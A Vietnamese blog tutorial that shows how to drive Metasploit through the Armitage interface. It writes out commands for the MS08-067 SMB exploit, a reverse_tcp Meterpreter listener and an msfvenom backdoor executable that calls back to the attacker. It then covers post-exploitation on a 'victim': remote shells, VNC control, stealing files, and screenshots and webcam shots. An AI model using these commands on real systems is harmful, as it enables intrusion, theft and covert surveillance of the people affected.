chia sẻ

Armitage-Công cụ hữu ích cho những ai ghiền Metasploit Framework

Chào các bạn

Như các bạn đã các biết, Metasploit framework là một công cụ rất hữu hiệu trong thử nghiệm thâm nhập. Nhưng nhược điểm của công cụ Metasploit Framework là chúng ta sẽ phải gõ lệnh, và khi thâm nhập được rồi thì số lệnh meterpreter còn khá ít và một số kĩ thuật nếu gõ lệnh sẽ phải thực hiện khá chật vật (Như kĩ thuật ăn cắp file chẳng hạn)

Hôm nay mình sẽ giới thiệu với các bạn công cụ Armitage, công cụ này sẽ giúp các bạn giải quyết hết những điều trên



I. Khởi chạy công cụ Armitage
B1: Mở Terminal lên và gõ Armitage


B2: Nhấp Connect và bấm Yes



B3: Thường là các bạn khi chạy Armitage lần đầu sẽ gặp 2 lỗi cơ bản sau. Xem video của mình để biết cách fix
1. Lỗi Could not connect to database


2. Lỗi MSF DATABASE CONFIG


B4: Chờ một chút và giao diện Armitage sẽ xuất hiện như hình

II. Làm quen với giao diện Armitage

III. DEMO các kĩ thuật tấn công sử dụng Armitage
1. Kĩ thuật khai thác lỗ hổng Windows (DEMO với lỗ hổng ms_08_067_netapi)
Nếu chúng ta dùng Metasploit Framework thì chúng ta cần gõ các lệnh sau. Mình chia thành 3 quá trình
Quá trình 1: Lựa chọn lỗ hổng
use payload/windows/meterpreter/reverse_tcp
use exploit/windows/smb/ms08_067_netapi
Quá trình 2: Cung cấp thông tin (Ở đây chính là RHOST-IP của victim)
set RHOST victim IP
Quá trình 3: Nhập lệnh để bắt đầu tấn công
exploit

Và đây là các bước khi chúng ta sử dụng Armitage
Giai đoạn 1: Lựa chọn lỗ hổng ở khung bên trái dưới dạng các Folder (/exploit/smb.ms08_067_netapi)

Giai đoạn 2: Nhấp đúp chuột vào tên lỗ hổng để hiện ra bảng nhập thông tin. Và cung cấp các thông tin còn thiếu (RHOST) hoặc chỉnh sửa các thông tin khác cho đúng

Giai đoạn 3: Nhấp Launch để bắt đầu việc tấn công, khi đó quá trình tấn công sẽ được diễn ra hoàn toàn tự động
Khi đó máy bị tấn công sẽ chuyển sang màu đỏ và có tia sét bao quanh

Giờ đây chúng ta có thể thực hiện các lệnh khai thác mà mình sẽ nói tới ở phần sau

2. Kĩ thuật tấn công sử dụng mã độc, backdoor (Bài 6 đến bài 9 Khóa học Hacking With Kali Linux)
Thông thường thì bài tấn công nào dùng mã độc mình cũng chia làm hai giai đoạn
Giai đoạn 1: Dùng các công cụ (msfvenom, unicorn, setoolkit) để tạo ra file chứa mã độc. Giai đoạn này các bạn làm bình thường
Giai đoạn 2: Giai đoạn đưa backdoor vào máy victim và thực thi:
Thông thường ở giai đoạn này bạn sẽ phải gõ các lệnh sau

use exploit/multi/handler (Chọn Exploit)
set PAYLOADS windows/meterpreter/reverse_tcp (Chọn Payload)
set LPORT 8080 (Đặt cổng của máy mình)
set LHOST MyIP (Nhập IP máy mình)
exploit -j (Kích hoạt tấn công)

Và đây là các bước khi các bạn làm ở Arimtage
Chọn Exploit: Các bạn mở theo đường dẫn exploit/multi/handler

Các bạn nhấp đúp vào mục handler để ra bảng khai báo thông tin

Các bạn khai báo các thông số (LHOST, LPORT, PAYLOAD) sao cho phù hợp với hình thức tấn công bạn đang sử dụng
Chẳng hạn, mình tạo file mã độc bằng lệnh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > /root/Desktop/Backdoor.exe
Thì mình khai báo như sau
LHOST: 192.168.15
LPORT: 8080
Payload: windows/meterpreter/reverse_tcp
Sau cùng các bạn bấm Launch khi đó Armitage sẽ tự động gõ các lệnh tấn công cho bạn


Khi Victim chạy file mã độc lên, biểu tượng máy victim sẽ chuyển sang màu đỏ như thế này

Khi đó các bạn bắt đầu có thể thực hiện các lệnh khai thác mình viết ở phần sau rồi

IV. Khai thác một máy ảo đã bị tấn công bằng Armitage
1. Interact (Tương tác)
Bạn phải chuột vào biểu tượng máy Victim chọn Interact

- Command Shell: Mở Command Promport trên máy Victim

-Meterpreter Shell: Mở phiên Meterpreter

Các bạn có thể xem các lệnh Meterpreter tại đây: Tổng hợp các lệnh Meterpreter
-Desktop (VNC): Điều khiển từ xa máy Victim.
B1: Khi Click vào Desktop (VNC) thì nó sẽ cho các ban 1 thông báo, bạn ghi lại chỗ IP và Port được khoanh đỏ (Có dạng 127.0.0.1:xxxx)

B2: Truy cập trang https://www.realvnc.com/download/vnc/ Chọn hệ điều hành là Linux. Download phiên bản Generic x86 hay x64 là còn tùy máy bạn 32bit hay 64bit
B3:Download về, xả nén ra và kéo thả file VNC Viewer vào Terminal rồi bấm Enter để chạy

B4: Gõ IP mà Armitage cho bạn vào

B4: Chọn Continue

B5: Xong

2. Explore (Khám phá)
Bạn phải chuột vào biểu tượng máy Victim chọn Explore

- Browse Files: Tìm kiếm và ăn cắp file trong máy victim

- Show Processes: Xem các tiến trình trong máy Victim

-Screenshot: Chụp lại ảnh màn hình Victim

- Webcam Shot: Chụp lại Webcam của Victim


KẾT BÀI

Nói chung, sử dụng Armitage không khó với những bạn nào đã thành thạo Metasploit Framework.

Bài viết tiếp theo có lẽ mình sẽ hướng dẫn các bạn vê Privilege Escalation (Leo thang đặc quyền Admin). Đây cũng chính là thứ gây ra lỗi khi các bạn thực hiện các lệnh tấn công trên hệ thống từ Windows 7 trở lên

Chúc các bạn thành công

Không có nhận xét nào:

Đăng nhận xét

 
Ky nang ban hang ky-nang-ban-hang
10 10 1125 (c) by
Google Thủ thuật, hacking, tool, code, công cụ